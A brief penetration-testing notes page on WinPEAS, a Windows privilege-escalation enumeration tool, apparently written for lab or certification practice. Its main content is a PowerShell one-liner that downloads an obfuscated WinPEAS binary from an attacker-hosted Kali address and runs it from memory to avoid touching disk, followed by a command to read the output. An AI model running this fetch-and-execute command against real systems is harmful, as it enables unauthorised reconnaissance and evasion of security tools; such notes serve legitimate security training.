WinPEAS

Download and host file on Kali

One liner to download and execute winPEASany from memory in a PS shell

$url = "http://192.168.45.242/winPEASany_ofs.exe"
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("log")

Read out.txt on Kali

less -r out.txt

Last updated